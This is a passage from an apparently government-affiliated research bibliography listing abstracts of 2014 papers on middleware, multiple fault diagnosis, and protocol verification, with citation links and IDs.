    Keywords: middleware; mobile computing; collaboration; context-defined group management; context-specific group communication; distributed middleware; emergency response; fleet tracking and management system; geopositioning; large-scale mobile applications; logistics; mobile networks; mobile nodes; mobile workforce management; node mutual awareness; public security; real-time monitoring; real-time tracking; reliable communication; surveillance; Logic gates; Manganese; Mobile nodes; Subscriptions; Vehicles; DDS; context-defined groups; group communication; group management; middleware; mobile systems (ID#:14-2199)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6815266&isnumber=6815123
  • Gazzarata, R.; Vergari, F.; Salmon Cinotti, T.; Giacomini, M., "A Standardized SOA For Clinical Data Interchange In A Cardiac Telemonitoring Environment," Biomedical and Health Informatics, IEEE Journal of, vol. PP, no.99, pp.1,1, July 2014. doi: 10.1109/JBHI.2014.2334372 Care of chronic cardiac patients requires information interchange between patients' homes, clinical environments and the Electronic Health Record (EHR). Standards are emerging to support clinical information collection, exchange and management and to overcome information fragmentation and actors delocalization. Heterogeneity of information sources at patients' homes calls for open solutions to collect and accommodate multi-domain information, including environmental data. Based on the experience gained in a European Research Program, this paper presents an integrated and open approach for clinical data interchange in cardiac telemonitoring applications. This interchange is supported by the use of standards following the indications provided by the national authorities of the countries involved. Taking into account the requirements provided by the medical staff involved in the project the authors designed and implemented a prototypal middleware, based on a Service Oriented Architecture (SOA) approach, to give a structured and robust tool to CHF (Congestive Heart Failure) patients for their personalized telemonitoring. The middleware is represented by a Health Record Management Service (HRMS), whose interface is compliant to the HSSP (Healthcare Services Specification Project) RLUS (Retrieve, Locate and Update Service) standard (Level 0), which allows communication between the agents involved through the exchange of CDA R2 (Clinical Document Architecture Release 2) documents. Three performance tests were carried out and showed that the prototype completely fulfilled all requirements indicated by the medical staff, however certain aspects, such as authentication, security and scalability, should be deeply analyzed within a future engineering phase.
    Keywords: Educational institutions; Informatics; Medical services; Semantics; Service-oriented architecture; Standards (ID#:14-2200)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6847101&isnumber=6363502
  • Potdar, M.S.; Manekar, AS.; Kadu, R.D., "Android "Health-Dr." Application for Synchronous Information Sharing," Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on , vol., no., pp.265,269, 7-9 April 2014. doi: 10.1109/CSNT.2014.58 Android "Health-DR." is innovative idea for ambulatory appliances. In rapid developing technology, we are providing "Health-DR." application for the insurance agent, dispensary, patients, physician, annals management (security) for annals. So principally, the ample of record are maintain in to the hospitals. The application just needs to be installed in the customer site with IT environment. Main purpose of our application is to provide the healthy environment to the patient. Our cream focus is on the "Health-DR." application meet to the patient regiment. For the personal use of member, we provide authentication service strategy for "Health-DR." application. Prospective strategy includes: Professional Authentications (User Authentication) by doctor to the patient, actuary and dispensary. Remote access is available to the medical annals, doctor affability and patient affability. "Health-DR." provides expertness anytime and anywhere. The application is middleware to isolate the information from affability management, client discovery and transit of database. Annotations of records are kept in the bibliography. Mainly, this paper focuses on the conversion of E-Health application with flexible surroundings.
    Keywords: Android (operating system);electronic health records; middleware; mobile computing; Android Health-Dr ;IT environment; affability management; ambulatory appliances ;annals management; bibliography; client discovery; database transit; dispensary; doctor affability; e-health application; healthy environment; insurance agent; medical annals; middleware; patient affability; physician; professional authentications; synchronous information sharing; user authentication; Androids; Authentication; Databases; Educational institutions; Insurance; Medical services; Mobile communication; Alert mechanism; Annotations of records; Doctor Flexibility; Health-DR. Engineering ;Insurance acumen or actuary Medical annals; Patient flexibility; Professional authentications (ID#:14-2201)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821398&isnumber=6821334
  • Dong-Hoon Shin; Shibo He; Junshan Zhang, "Robust, Secure, and Cost-Effective Design for Cyber-Physical Systems," Intelligent Systems, IEEE , vol.29, no.1, pp.66,69, Jan.-Feb. 2014. doi: 10.1109/MIS.2014.9 Cyber-physical systems (CPS) can potentially benefit a wide array of applications and areas. Here, the authors look at some of the challenges surrounding CPS, and consider a feasible solution for creating a robust, secure, and cost-effective architecture.
    Keywords: middleware; power system security; smart power grids ;stability; CPS; cost-effective architecture; cost-effective design; cyberphysical systems; middleware; robustness; security vulnerability ; mart grid; Cyberphysical systems Logic gates; Middleware; Monitoring; Phasor measurement units; Quality of service; Robustness; CPS; CPSS; cyber-physical systems; cyber-physical-social systems; intelligent systems; middleware (ID#:14-2202)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6802237&isnumber=6802214
  • Li, X.; Ma, H.; Zhou, F.; Gui, X., "Service Operator-aware Trust Scheme for Resource Matchmaking across Multiple Clouds," Parallel and Distributed Systems, IEEE Transactions on , vol.PP, no.99, pp.1,1, May 2014. doi: 10.1109/TPDS.2014.2321750 This paper proposes a service operator-aware trust scheme (SOTS) for resource matchmaking across multiple clouds. Through analyzing the built-in relationship between the users, the broker, and the service resources, this paper proposes a middleware framework of trust management that can effectively reduce user burden and improve system dependability. Based on multi-dimensional resource service operators, we model the problem of trust evaluation as a process of multi-attribute decision-making, and develop an adaptive trust evaluation approach based on information entropy theory. This adaptive approach can overcome the limitations of traditional trust schemes, whereby the trusted operators are weighted manually or subjectively. As a result, using SOTS, the broker can efficiently and accurately prepare the most trusted resources in advance, and thus provide more dependable resources to users. Our experiments yield interesting and meaningful observations that can facilitate the effective utilization of SOTS in a large-scale multi-cloud environment.
    Keywords: Availability; Computational modeling; Entropy; Information entropy; Registers; Security (ID#:14-2203)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6810192&isnumber=4359390
  • Ravindran, K.; Mukhopadhyay, S.; Sidhanta, S.; Sabbir, A, "Managing shared contexts in distributed multi-player game systems," Communication Systems and Networks (COMSNETS), 2014 Sixth International Conference on , vol., no., pp.1,8, 6-10 Jan. 2014. doi: 10.1109/COMSNETS.2014.6734908 In this paper, we consider the impact of a weaker model of eventual consistency on distributed multi-player games. This model is suitable for networks in which hosts can leave and join at anytime, e.g., in an intermittently connected environment. Such a consistency model is provided by the Secure Infrastructure for Networked Systems (SINS) [24], a reliable middleware framework. SINS allows agents to communicate asynchronously through a distributed transactional key-value store using anonymous publish-subscribe. It uses Lamport's Paxos protocol [17] to replicate state. We consider a multi-player maze game as example to illustrate our consistency model and the impact of network losses/delays therein. The framework based on SINS presented herein provides a vehicle for studying the effect of human elements participating in collaborative simulation of a physical world as in war games.
    Keywords: computer games; message passing; middleware; protocols; security of data; Lamport Paxos protocol; SINS; anonymous publish-subscribe; distributed multiplayer game systems; distributed transactional key-value store; multiplayer maze game; network losses-delay; reliable middleware framework; secure infrastructure for networked systems; shared context mapping; war games; Delays; Irrigation; Protocols; Real-time systems; Receivers; Semantics; Silicon compounds (ID#:14-2204)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6734908&isnumber=6734849
  • Apolinarski, W.; Iqbal, U.; Parreira, J.X., "The GAMBAS Middleware And SDK For Smart City Applications," Pervasive Computing and Communications Workshops (PERCOM Workshops), 2014 IEEE International Conference on , vol., no., pp.117,122, 24-28 March 2014. doi: 10.1109/PerComW.2014.6815176 The concept of smart cities envisions services that provide distraction-free support for citizens. To realize this vision, the services must adapt to the citizens' situations, behaviors and intents at runtime. This requires services to gather and process the context of their users. Mobile devices provide a promising basis for determining context in an automated manner on a large scale. However, despite the wide availability of versatile programmable mobile platforms such as Android and iOS, there are only few examples of smart city applications. One reason for this is that existing software platforms primarily focus on low-level resource management which requires application developers to repeatedly tackle many challenging tasks. Examples include efficient data acquisition, secure and privacy-preserving data distribution as well as interoperable data integration. In this paper, we describe the GAMBAS middleware which tries to simplify the development of smart city applications. To do this, GAMBAS introduces a Java-based runtime system with an associated software development kit (SDK). To clarify how the runtime system and the SDK can be used for application development, we describe two simple applications that highlight different middleware functions.
    Keywords: Java; middleware; software engineering; GAMBAS middleware; Java-based runtime system; SDK; distraction-free support; smart city applications; software development kit; Androids; Cities and towns; Data acquisition; Humanoid robots; Middleware; Runtime; Security (ID#:14-2205)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6815176&isnumber=6815123

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Multiple Fault Diagnosis

Multiple Fault Diagnosis


According to Shakeri, "the computational complexity of solving the optimal multiple-fault isolation problem is super exponential." Most processes and procedures assume that there will be only one fault at any given time. Many algorithms are designed to do sequential diagnostics. With the growth of cloud computing and multicore processors and the ubiquity of sensors, the problem of multiple fault diagnosis has grown even larger. The research cited here, from the first half of 2014, looks at different detection methods in a variety of media.

  • M. El-Koujok, M. Benammar, N. Meskin, M. Al-Naemi, R. Langari, "Multiple Sensor Fault Diagnosis By Evolving Data-Driven Approach," Information Sciences: an International Journal, Volume 259, February, 2014, Pages 346-358. doi>10.1016/j.ins.2013.04.012 Sensors are indispensable components of modern plants and processes and their reliability is vital to ensure reliable and safe operation of complex systems. In this paper, the problem of design and development of a data-driven Multiple Sensor Fault Detection and Isolation (MSFDI) algorithm for nonlinear processes is investigated. The proposed scheme is based on an evolving multi-Takagi Sugeno framework in which each sensor output is estimated using a model derived from the available input/output measurement data. Our proposed MSFDI algorithm is applied to Continuous-Flow Stirred-Tank Reactor (CFSTR). Simulation results demonstrate and validate the performance capabilities of our proposed MSFDI algorithm.
    Keywords: Data-driven approach, Nonlinear system, Sensor fault diagnosis (ID#:14-2206)
    URL: http://dl.acm.org/citation.cfm?id=2564929.2565018&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1016/j.ins.2013.04.012
  • Yu-Lin He, Ran Wang, Sam Kwong, Xi-Zhao Wang, "Bayesian Classifiers Based On Probability Density Estimation And Their Applications To Simultaneous Fault Diagnosis," Information Sciences: an International Journal, Volume 259, February, 2014, Pages 252-268. doi>10.1016/j.ins.2013.09.003 A key characteristic of simultaneous fault diagnosis is that the features extracted from the original patterns are strongly dependent. This paper proposes a new model of Bayesian classifier, which removes the fundamental assumption of naive Bayesian, i.e., the independence among features. In our model, the optimal bandwidth selection is applied to estimate the class-conditional probability density function (p.d.f.), which is the essential part of joint p.d.f. estimation. Three well-known indices, i.e., classification accuracy, area under ROC curve, and probability mean square error, are used to measure the performance of our model in simultaneous fault diagnosis. Simulations show that our model is significantly superior to the traditional ones when the dependence exists among features.
    Keywords: Bayesian classification, Dependent feature, Joint probability density estimation, Optimal bandwidth, Simultaneous fault diagnosis, Single fault (ID#:14-2207)
    URL: http://dl.acm.org/citation.cfm?id=2564929.2564984&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1016/j.ins.2013.09.003
  • Marcin Perzyk, Andrzej Kochanski, Jacek Kozlowski, Artur Soroczynski, Robert Biernacki, "Comparison of Data Mining Tools For Significance Analysis Of Process Parameters In Applications To Process Fault Diagnosis," Information Sciences: an International Journal, Volume 259, February, 2014, Pages 380-392. doi>10.1016/j.ins.2013.10.019 This paper presents an evaluation of various methodologies used to determine relative significances of input variables in data-driven models. Significance analysis applied to manufacturing process parameters can be a useful tool in fault diagnosis for various types of manufacturing processes. It can also be applied to building models that are used in process control. The relative significances of input variables can be determined by various data mining methods, including relatively simple statistical procedures as well as more advanced machine learning systems. Several methodologies suitable for carrying out classification tasks which are characteristic of fault diagnosis were evaluated and compared from the viewpoint of their accuracy, robustness of results and applicability. Two types of testing data were used: synthetic data with assumed dependencies and real data obtained from the foundry industry. The simple statistical method based on contingency tables revealed the best overall performance, whereas advanced machine learning models, such as ANNs and SVMs, appeared to be of less value.
    Keywords: Data mining, Fault diagnosis, Input variable significance, Manufacturing industries (ID#:14-2208)
    URL: http://dl.acm.org/citation.cfm?id=2564929.2564988&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1016/j.ins.2013.10.019
  • Suming Chen, Arthur Choi, Adnan Darwiche," Algorithms and Applications For The Same-Decision Probability "Journal of Artificial Intelligence Research, Volume 49 Issue 1, January 2014, Pages 601-633. (doi not provided) When making decisions under uncertainty, the optimal choices are often difficult to discern, especially if not enough information has been gathered. Two key questions in this regard relate to whether one should stop the information gathering process and commit to a decision (stopping criterion), and if not, what information to gather next (selection criterion). In this paper, we show that the recently introduced notion, Same-Decision Probability (SDP), can be useful as both a stopping and a selection criterion, as it can provide additional insight and allow for robust decision making in a variety of scenarios. This query has been shown to be highly intractable, being PPPP-complete, and is exemplary of a class of queries which correspond to the computation of certain expectations. We propose the first exact algorithm for computing the SDP, and demonstrate its effectiveness on several real and synthetic networks. Finally, we present new complexity results, such as the complexity of computing the SDP on models with a Naive Bayes structure. Additionally, we prove that computing the non-myopic value of information is complete for the same complexity class as computing the SDP
    Keywords: (not provided) (ID#:14-2209)
    URL: http://dl.acm.org/citation.cfm?id=2655713.2655730
  • Nithiyanantham Janakiraman, Palanisamy Nirmal Kumar, "Multi-objective Module Partitioning Design For Dynamic And Partial Reconfigurable System-On-Chip Using Genetic Algorithm," Journal of Systems Architecture: the EUROMICRO Journal, Volume 60 Issue 1, January, 2014, Pages 119-139. doi>10.1016/j.sysarc.2013.10.001 This paper proposes a novel architecture for module partitioning problems in the process of dynamic and partial reconfigurable computing in VLSI design automation. This partitioning issue is deemed as Hypergraph replica. This can be treated by a probabilistic algorithm like the Markov chain through the transition probability matrices due to non-deterministic polynomial complete problems. This proposed technique has two levels of implementation methodology. In the first level, the combination of parallel processing of design elements and efficient pipelining techniques are used. The second level is based on the genetic algorithm optimization system architecture. This proposed methodology uses the hardware/software co-design and co-verification techniques. This architecture was verified by implementation within the MOLEN reconfigurable processor and tested on a Xilinx Virtex-5 based development board. This proposed multi-objective module partitioning design was experimentally evaluated using an ISPD'98 circuit partitioning benchmark suite. The efficiency and throughput were compared with that of the hMETIS recursive bisection partitioning approach. The results indicate that the proposed method can improve throughput and efficiency up to 39 times with only a small amount of increased design space. The proposed architecture style is sketched out and concisely discussed in this manuscript, and the existing results are compared and analyzed. (ID#:14-2210)
    URL: http://dl.acm.org/citation.cfm?id=2566270.2566391&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1016/j.sysarc.2013.10.001
  • Cook, A; Wunderlich, H.-J., "Diagnosis of Multiple Faults With Highly Compacted Test Responses," Test Symposium (ETS), 2014 19th IEEE European , vol., no., pp.1,6, 26-30 May 2014. doi: 10.1109/ETS.2014.6847796 Defects cluster, and the probability of a multiple fault is significantly higher than just the product of the single fault probabilities. While this observation is beneficial for high yield, it complicates fault diagnosis. Multiple faults will occur especially often during process learning, yield ramp-up and field return analysis. In this paper, a logic diagnosis algorithm is presented which is robust against multiple faults and which is able to diagnose multiple faults with high accuracy even on compressed test responses as they are produced in embedded test and built-in self-test. The developed solution takes advantage of the linear properties of a MISR compactor to identify a set of faults likely to produce the observed faulty signatures. Experimental results show an improvement in accuracy of up to 22 % over traditional logic diagnosis solutions suitable for comparable compaction ratios.
    Keywords: built-in self test; fault diagnosis; integrated circuit testing; integrated circuit yield; probability; MISR compactor; built-in self-test; compacted test responses; compressed test responses; defects cluster; embedded test; faulty signatures; field return analysis; linear properties; logic diagnosis; multiple fault diagnosis; multiple fault probability; process learning; yield ramp-up; Accuracy; Built-in self-test; Circuit faults; Compaction; Equations; Fault diagnosis; Mathematical model; Diagnosis; Multiple Faults; Response Compaction (ID#:14-2211)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6847796&isnumber=6847779
  • Kundu, S.; Jha, A; Chattopadhyay, S.; Sengupta, I; Kapur, R., "Framework for Multiple-Fault Diagnosis Based on Multiple Fault Simulation Using Particle Swarm Optimization," Very Large Scale Integration (VLSI) Systems, IEEE Transactions on , vol.22, no.3, pp.696,700, March 2014. doi: 10.1109/TVLSI.2013.2249542 This brief proposes a framework to analyze multiple faults based on multiple fault simulation in a particle swarm optimization environment. Experimentation shows that up to ten faults can be diagnosed in a reasonable time. However, the scheme does not put any restriction on the number of simultaneous faults.
    Keywords: fault simulation; integrated circuit testing; particle swarm optimisation; multiple fault diagnosis; multiple fault simulation; particle swarm optimization; Automatic test pattern generation (ATPG);effect-cause analysis ;fault diagnosis; multiple fault injection; particle swarm optimization (PSO) (ID#:14-2212)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6488883&isnumber=6746074
  • Cheng-Hung Wu; Kuen-Jong Lee; Wei-Cheng Lien, "An Efficient Diagnosis Method To Deal With Multiple Fault-Pairs Simultaneously Using A Single Circuit Model," VLSI Test Symposium (VTS), 2014 IEEE 32nd , vol., no., pp.1,6, 13-17 April 2014. doi: 10.1109/VTS.2014.6818790 This paper proposes an efficient diagnosis-aware ATPG method that can quickly identify equivalent-fault pairs and generate diagnosis patterns for nonequivalent-fault pairs, where an (non)equivalent-fault pair contains two stuck-at faults that are (not) equivalent. A novel fault injection method is developed which allows one to embed all fault pairs undistinguished by the conventional test patterns into a circuit model with only one copy of the original circuit. Each pair of faults to be processed is transformed to a stuck-at fault and all fault pairs can be dealt with by invoking an ordinary ATPG tool for stuck-at faults just once. High efficiency of diagnosis pattern generation can be achieved due to 1) the circuit to be processed is read only once, 2) the data structure for ATPG process is constructed only once, 3) multiple fault pairs can be processed at a time, and 4) only one copy of the original circuit is needed. Experimental results show that this is the first reported work that can achieve 100% diagnosis resolutions for all ISCAS'89 and IWLS'05 benchmark circuits using an ordinary ATPG tool. Furthermore, we also find that the total number of patterns required to deal with all fault pairs in our method is smaller than that of the current state-of-the-art work.
    Keywords: automatic test pattern generation; fault diagnosis;ISCAS'89 benchmark circuit;IWLS'05 benchmark circuit; automatic test pattern generation; diagnosis pattern generation; diagnosis-aware ATPG method; fault injection; fault pairs diagnosis; nonequivalent-fault pairs; single circuit model; stuck-at faults; Automatic test pattern generation; Central Processing Unit;Circuit faults; Fault diagnosis; Integrated circuit modeling; Logic gates; Multiplexing; Fault diagnosis; diagnosis pattern generation;multi-pair diagnosis (ID#:14-2213)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6818790&isnumber=6818727
  • Zhao, Chunhui, "Fault subspace selection and analysis of relative changes based reconstruction modeling for multi-fault diagnosis," Control and Decision Conference (2014 CCDC), The 26th Chinese , vol., no., pp.235,240, May 31 2014-June 2 2014. doi: 10.1109/CCDC.2014.6852151 Online fault diagnosis has been a crucial task for industrial processes. Reconstruction-based fault diagnosis has been drawing special attentions as a good alternative to the traditional contribution plot. It identifies the fault cause by finding the specific fault subspace that can well eliminate alarming signals from a bunch of alternatives that have been prepared based on historical fault data. However, in practice, the abnormality may result from the joint effects of multiple faults, which thus can not be well corrected by single fault subspace archived in the historical fault library. In the present work, an aggregative reconstruction-based fault diagnosis strategy is proposed to handle the case where multiple fault causes jointly contribute to the abnormal process behaviors. First, fault subspaces are extracted based on historical fault data in two different monitoring subspaces where analysis of relative changes is taken to enclose the major fault effects that are responsible for different alarming monitoring statistics. Then, a fault subspace selection strategy is developed to analyze the combinatorial fault nature which will sort and select the informative fault subspaces that are most likely to be responsible for the concerned abnormalities. Finally, an aggregative fault subspace is calculated by combining the selected fault subspaces which represents the joint effects from multiple faults and works as the final reconstruction model for online fault diagnosis. Theoretical support is framed and the related statistical characteristics are analyzed. Its feasibility and performance are illustrated with simulated multi-faults using data from the Tennessee Eastman (TE) benchmark process.
    Keywords: Analytical models; Data models; Fault diagnosis; Joints; Libraries; Monitoring; Principal component analysis; analysis of relative changes; fault subspace selection; joint fault effects; multi-fault diagnosis; reconstruction modeling (ID#:14-2214)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6852151&isnumber=6852105
  • Liu, K.; Ma, Q.; Gong, W.; Miao, X.; Liu, Y., "Self-Diagnosis for Large Scale Wireless Sensor Networks," Wireless Communications, IEEE Transactions on, vol. PP, no.99, pp.1, 1, July 2014. doi: 10.1109/TWC.2014.2336653 Existing approaches to diagnosing sensor networks are generally sink-based, which rely on actively pulling state information from sensor nodes so as to conduct centralized analysis. First, sink-based tools incur huge communication overhead to the traffic sensitive sensor networks. Second, due to the unreliable wireless communications, sink often obtains incomplete and suspicious information, leading to inaccurate judgments. Even worse, it is always more difficult to obtain state information from problematic or critical regions. To address above issues, we present a novel self-diagnosis approach, which encourages each single sensor to join the fault decision process. We design a series of fault detectors through which multiple nodes can cooperate with each other in a diagnosis task. Fault detectors encode the diagnosis process to state transitions. Each sensor can participate in the diagnosis by transiting the detector's current state to a new one based on local evidences and then pass the detector to other nodes. Having sufficient evidences, the fault detector achieves the Accept state and outputs final diagnosis report. We examine the performance of our self-diagnosis tool called TinyD2 on a 100 nodes indoor testbed and conduct field studies in the GreenOrbs system which is an operational sensor network with 330 nodes outdoor.
    Keywords: Debugging; Detectors; Fault detection; Fault diagnosis; Measurement; Wireless communication; Wireless sensor networks (ID#:14-2215)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6850017&isnumber=4656680
  • Kannan, S.; Karimi, N.; Karri, R.; Sinanoglu, O., "Detection, Diagnosis, And Repair Of Faults In Memristor-Based Memories," VLSI Test Symposium (VTS), 2014 IEEE 32nd , vol., no., pp.1,6, 13-17 April 2014. doi: 10.1109/VTS.2014.6818762 Memristors are an attractive option for use in future memory architectures due to their non-volatility, high density and low power operation. Notwithstanding these advantages, memristors and memristor-based memories are prone to high defect densities due to the non-deterministic nature of nanoscale fabrication. The typical approach to fault detection and diagnosis in memories entails testing one memory cell at a time. This is time consuming and does not scale for the dense, memristor-based memories. In this paper, we integrate solutions for detecting and locating faults in memristors, and ensure post-silicon recovery from memristor failures. We propose a hybrid diagnosis scheme that exploits sneak-paths inherent in crossbar memories, and uses March testing to test and diagnose multiple memory cells simultaneously, thereby reducing test time. We also provide a repair mechanism that prevents faults in the memory from being activated. The proposed schemes enable and leverage sneak paths during fault detection and diagnosis modes, while still maintaining a sneak-path free crossbar during normal operation. The proposed hybrid scheme reduces fault detection and diagnosis time by ~44%, compared to traditional March tests, and repairs the faulty cell with minimal overhead.
    Keywords: fault diagnosis; memristors; random-access storage; March testing; crossbar memories; fault detection; fault diagnosis; faulty cell repairs; future memory architectures; high defect densities; hybrid diagnosis scheme; memristor failures; memristor-based memories; multiple memory cells testing; nanoscale fabrication; post-silicon recovery; sneak-path free crossbar; test time; Circuit faults; Fault detection; Integrated circuits; Maintenance engineering; Memristors; Resistance; Testing; Memory; Memristor; Sneak-paths; Testing (ID#:14-2216)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6818762&isnumber=6818727
  • Xin Xia; Yang Feng; Lo, D.; Zhenyu Chen; Xinyu Wang, "Towards More Accurate Multi-Label Software Behavior Learning," Software Maintenance, Reengineering and Reverse Engineering (CSMR-WCRE), 2014 Software Evolution Week - IEEE Conference on , vol., no., pp.134,143, 3-6 Feb. 2014. doi: 10.1109/CSMR-WCRE.2014.6747163In a modern software system, when a program fails, a crash report which contains an execution trace would be sent to the software vendor for diagnosis. A crash report which corresponds to a failure could be caused by multiple types of faults simultaneously. Many large companies such as Baidu organize a team to analyze these failures, and classify them into multiple labels (i.e., multiple types of faults). However, it would be time-consuming and difficult for developers to manually analyze these failures and come out with appropriate fault labels. In this paper, we automatically classify a failure into multiple types of faults, using a composite algorithm named MLL-GA, which combines various multi-label learning algorithms by leveraging genetic algorithm (GA). To evaluate the effectiveness of MLL-GA, we perform experiments on 6 open source programs and show that MLL-GA could achieve average F-measures of 0.6078 to 0.8665. We also compare our algorithm with Ml.KNN and show that on average across the 6 datasets, MLL-GA improves the average F-measure of MI.KNN by 14.43%.
    Keywords: genetic algorithms ;learning (artificial intelligence);public domain software; software fault tolerance; software maintenance; Baidu;F-measures; MLL-GA;Ml. KNN; crash report; execution trace; fault labels; genetic algorithm; modern software system; multilabel software behavior learning; open source programs; software vendor; Biological cells; Computer crashes; Genetic algorithms; Prediction algorithms; Software; Software algorithms; Training; Genetic Algorithm; Multi-label Learning; Software Behavior Learning (ID#:14-2217)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6747163&isnumber=6747152
  • Sun, J.; Liao, H.; Upadhyaya, B.R., "A Robust Functional-Data-Analysis Method for Data Recovery in Multichannel Sensor Systems," Cybernetics, IEEE Transactions on , vol.44, no.8, pp.1420,1431, Aug. 2014. doi: 10.1109/TCYB.2013.2285876 Multichannel sensor systems are widely used in condition monitoring for effective failure prevention of critical equipment or processes. However, loss of sensor readings due to malfunctions of sensors and/or communication has long been a hurdle to reliable operations of such integrated systems. Moreover, asynchronous data sampling and/or limited data transmission are usually seen in multiple sensor channels. To reliably perform fault diagnosis and prognosis in such operating environments, a data recovery method based on functional principal component analysis (FPCA) can be utilized. However, traditional FPCA methods are not robust to outliers and their capabilities are limited in recovering signals with strongly skewed distributions (i.e., lack of symmetry). This paper provides a robust data-recovery method based on functional data analysis to enhance the reliability of multichannel sensor systems. The method not only considers the possibly skewed distribution of each channel of signal trajectories, but is also capable of recovering missing data for both individual and correlated sensor channels with asynchronous data that may be sparse as well. In particular, grand median functions, rather than classical grand mean functions, are utilized for robust smoothing of sensor signals. Furthermore, the relationship between the functional scores of two correlated signals is modeled using multivariate functional regression to enhance the overall data-recovery capability. An experimental flow-control loop that mimics the operation of coolant-flow loop in a multimodular integral pressurized water reactor is used to demonstrate the effectiveness and adaptability of the proposed data-recovery method. The computational results illustrate that the proposed method is robust to outliers and more capable than the existing FPCA-based method in terms of the accuracy in recovering strongly skewed signals. In addition, turbofan engine data are also analyzed to verify the capability of t- e proposed method in recovering non-skewed signals.
    Keywords: Bandwidth; Data models; Eigenvalues and eigenfunctions; Predictive models; Robustness; Sensor systems; Sun; Asynchronous data; condition monitoring; data recovery; robust functional principal component analysis (ID#:14-2218)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6670785&isnumber=6856256
  • Simon, S.; Liu, S., "An Automated Design Method for Fault Detection and Isolation of Multidomain Systems Based on Object-Oriented Models," Mechatronics, IEEE/ASME Transactions on, vol. PP, no.99, pp. 1, 13, July 2014. doi: 10.1109/TMECH.2014.2330904 In this paper, it is shown that the high automation level of the object-oriented modeling paradigm for physical systems can significantly rationalize the design procedure of fault detection and isolation (FDI) systems. Consequently, an object-oriented FDI method for complex engineering systems consisting of subsystems from different physical domains like mechatronic systems, commercial vehicles, and chemical process plants is developed. The mathematical composition of the objects corresponding to the subsystems results in a differential algebraic equation (DAE) that describes the overall system. This DAE is automatically analyzed and transferred into a set of residual generators that enable a two-stage FDI procedure for multiple fault modes.
    Keywords: Automated design of fault detection and isolation (FDI) systems; model-based diagnosis; object-oriented modeling of multidomain systems (ID#:14-2219)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6857410&isnumber=4785241
  • Mehdi Namdari, Hooshang Jazayeri-Rad, "Incipient Fault Diagnosis Using Support Vector Machines Based On Monitoring Continuous Decision Functions," Engineering Applications of Artificial Intelligence, Volume 28, February, 2014, Pages 22-35. doi>10.1016/j.engappai.2013.11.013 Support Vector Machine (SVM) as an innovative machine learning tool, based on statistical learning theory, is recently used in process fault diagnosis tasks. In the application of SVM to a fault diagnosis problem, typically a discrete decision function with discrete output values is utilized in order to solely define the label of the fault. However, for incipient faults in which fault steadily progresses over time and there is a changeover from normal operation to faulty operation, using discrete decision function does not reveal any evidence about the progress and depth of the fault. Numerous process faults, such as the reactor fouling and degradation of catalyst, progress slowly and can be categorized as incipient faults. In this work a continuous decision function is anticipated. The decision function values not only define the fault label, but also give qualitative evidence about the depth of the fault. The suggested method is applied to incipient fault diagnosis of a continuous binary mixture distillation column and the result proves the practicability of the proposed approach. In incipient fault diagnosis tasks, the proposed approach outperformed some of the conventional techniques. Moreover, the performance of the proposed approach is better than typical discrete based classification techniques employing some monitoring indexes such as the false alarm rate, detection time and diagnosis time.
    Keywords: Binary mixture distillation column, Continuous decision function, Incipient fault diagnosis, Pattern recognition, Support vector machines (ID#:14-2220)
    URL: http://dl.acm.org/citation.cfm?id=2574578.2574707&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1016/j.engappai.2013.11.013

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Protocol Verification

Protocol Verification


Verifying the accuracy of security protocols is a primary goal of cybersecurity. Research into the area has sought to identify new and better algorithms and to identify better methods for verifying security protocols in myriad applications and environments. The papers presented here are from the first half of 2014.

  • Rui Zhou; Rong Min; Qi Yu; Chanjuan Li; Yong Sheng; Qingguo Zhou; Xuan Wang; Kuan-Ching Li, "Formal Verification of Fault-Tolerant and Recovery Mechanisms for Safe Node Sequence Protocol," Advanced Information Networking and Applications (AINA), 2014 IEEE 28th International Conference on , vol., no., pp.813,820, 13-16 May 2014.doi: 10.1109/AINA.2014.99 Fault-tolerance has huge impact on embedded safety-critical systems. As technology that assists to the development of such improvement, Safe Node Sequence Protocol (SNSP) is designed to make part of such impact. In this paper, we present a mechanism for fault-tolerance and recovery based on the Safe Node Sequence Protocol (SNSP) to strengthen the system robustness, from which the correctness of a fault-tolerant prototype system is analyzed and verified. In order to verify the correctness of more than thirty failure modes, we have partitioned the complete protocol state machine into several subsystems, followed to the injection of corresponding fault classes into dedicated independent models. Experiments demonstrate that this method effectively reduces the size of overall state space, and verification results indicate that the protocol is able to recover from the fault model in a fault-tolerant system and continue to operate as errors occur.
